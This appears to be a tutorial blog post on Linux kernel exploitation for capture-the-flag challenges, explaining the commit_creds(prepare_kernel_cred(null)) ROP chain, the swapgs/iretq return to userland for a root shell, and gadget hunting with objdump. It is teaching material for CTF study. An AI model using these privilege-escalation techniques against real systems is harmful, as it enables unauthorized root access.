An Intro to Linux Kernel Pwn in CTF

Intro

In this post we will have a brief view about Linux kernel pwn, what we need to do and how it works.

Actually Linux kernel pwn is similar to userland pwn, except that our target is the kernel(or kernel module). In most of the cases, the vulnerability is in custom Linux Kernel Module, LKM, which provides service to user as a part of kernel in ring0. Usually, the emulator for the task in Linux kernel pwn in CTF is qemu. And the challenge will often be deployed with the following files:

vmlinux, the Linux kernel. Sometimes it will be packed into bzImage from which you can extract the kernel. The kernel is an ELF file and you can run ROPGadget or ropper against it like common userland pwn.
Linux root file system. The compression schemes are usually cpio and gzip
A script to launch the emulator with specific configuration

Let’s go further now, some basic knowledge of operating system is required here.

Our goal

Our main goal in Linux kernel pwn is getting root privilege since the “flag” can only be accessed with root in most cases, which means privilege escalation.

Privilege escalation

First let’s take a look at the structure of process in Linux kernel.

struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
	/*
	 * For reasons of header soup (see current_thread_info()), this
	 * must be the first element of task_struct.
	 */
	struct thread_info		thread_info;
#endif
	unsigned int			__state;

#ifdef CONFIG_PREEMPT_RT
	/* saved state for "spinlock sleepers" */
	unsigned int			saved_state;
#endif

    // ...........
    
    /* Process credentials: */

	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;

	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

    // ............
};

and struct cred contains the gid and uid of the process. It’s obviously that if we can control the subjective cred of a specific process then we can achieve privilege escaltion.

Luckily, we do have serveral ways to change our credential:

Overwrite the cred in the link list of process with arbitary kernel rw.
Find the code path in kernel that can set the credential of process and perform a kernel ROP.

Also, we can control another process with root privilege and gain arbitary code exec in that process. But we will take a closer look at the last one first since it’s almost the same as ROP in userland.

Kernel ROP

We need to find a method to assign new cred to our process. Searching through the source code, we find that

/**
 * commit_creds - Install new credentials upon the current task
 * @new: The credentials to be assigned
 *
 * Install a new set of credentials to the current task, using RCU to replace
 * the old set.  Both the objective and the subjective credentials pointers are
 * updated.  This function may not be called if the subjective credentials are
 * in an overridden state.
 *
 * This function eats the caller's reference to the new credentials.
 *
 * Always returns 0 thus allowing this function to be tail-called at the end
 * of, say, sys_setgid().
 */

 int commit_creds(struct cred *new) { /* ... */ }

Exactly what we need! So if we can find a cred for a process with root privilege then we can use the function above to assign this cred to our process(current process). Luckily, we have

/**
 * prepare_kernel_cred - Prepare a set of credentials for a kernel service
 * @daemon: A userspace daemon to be used as a reference
 *
 * Prepare a set of credentials for a kernel service.  This can then be used to
 * override a task's own credentials so that work can be done on behalf of that
 * task that requires a different subjective context.
 *
 * @daemon is used to provide a base for the security record, but can be NULL.
 * If @daemon is supplied, then the security data will be derived from that;
 * otherwise they'll be set to 0 and no groups, full capabilities and no keys.
 *
 * The caller may change these controls afterwards if desired.
 *
 * Returns the new credentials or NULL if out of memory.
 */

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;

	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;

	kdebug("prepare_kernel_cred() alloc %p", new);

	if (daemon)
		old = get_task_cred(daemon);
	else
		old = get_cred(&init_cred);

	validate_creds(old);
    // ............
}

When daemon is null, old will be set to init_cred

struct cred init_cred = {
	.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
	.subscribers		= ATOMIC_INIT(2),
	.magic			= CRED_MAGIC,
#endif
	.uid			= GLOBAL_ROOT_UID,
	.gid			= GLOBAL_ROOT_GID,
	.suid			= GLOBAL_ROOT_UID,
	.sgid			= GLOBAL_ROOT_GID,
	.euid			= GLOBAL_ROOT_UID,
	.egid			= GLOBAL_ROOT_GID,
	.fsuid			= GLOBAL_ROOT_UID,
	.fsgid			= GLOBAL_ROOT_GID,
	.securebits		= SECUREBITS_DEFAULT,
	.cap_inheritable	= CAP_EMPTY_SET,
	.cap_permitted		= CAP_FULL_SET,
	.cap_effective		= CAP_FULL_SET,
	.cap_bset		= CAP_FULL_SET,
	.user			= INIT_USER,
	.user_ns		= &init_user_ns,
	.group_info		= &init_groups,
	.ucounts		= &init_ucounts,
};

Which has all we need! So our ROP chain should be

1	commit_creds(prepare_kernel_cred(null));

after which we can achieve privilege escalation.

Back to userland

After we getting root privilege, we are still in kernel mode. Our main goal is spawning a root shell in userland, so we need to return to user mode with the following steps.

swapgs
iretq

Take a look at the implementation of Linux

SYM_CODE_START_LOCAL(common_interrupt_return)
SYM_INNER_LABEL(swapgs_restore_regs_and_return_to_usermode, SYM_L_GLOBAL)
#ifdef CONFIG_DEBUG_ENTRY
	/* Assert that pt_regs indicates user mode. */
	testb	$3, CS(%rsp)
	jnz	1f
	ud2
1:
#endif
	POP_REGS pop_rdi=0

	/*
	 * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
	 * Save old stack pointer and switch to trampoline stack.
	 */
	movq	%rsp, %rdi
	movq	PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp
	UNWIND_HINT_EMPTY

	/* Copy the IRET frame to the trampoline stack. */
	pushq	6*8(%rdi)	/* SS */
	pushq	5*8(%rdi)	/* RSP */
	pushq	4*8(%rdi)	/* EFLAGS */
	pushq	3*8(%rdi)	/* CS */        <--- save the above register and recover
	pushq	2*8(%rdi)	/* RIP */       <--- spawn our root shell here

	/* Push user RDI on the trampoline stack. */
	pushq	(%rdi)

	/*
	 * We are on the trampoline stack.  All regs except RDI are live.
	 * We can do future final exit work right here.
	 */
	STACKLEAK_ERASE_NOCLOBBER

	SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

	/* Restore RDI. */
	popq	%rdi
	SWAPGS
	INTERRUPT_RETURN    <--- iretq

So the layout of the stack should be

+--------------------------------+
| commit new cred to our process |
+--------------------------------+
| addr of swapgs_ret             |
+--------------------------------+
| addr of iretq	                 |
+--------------------------------+
| previous rip(spawn root shell) |
+--------------------------------+
| previous cs                    |
+--------------------------------+
| previous eflags                |
+--------------------------------+
| previous rsp                   |
+--------------------------------+
| previous ss                    |
+--------------------------------+

ROPGadget will fail to find iretq sometimes, we can use the following command to find the gadget.

1
2
3

objdump -j .text -d ./vmlinux | grep iretq | head -1
ffffffff81050ef2: 48 cf                	iretq

After returning to userland, you will get a root shell.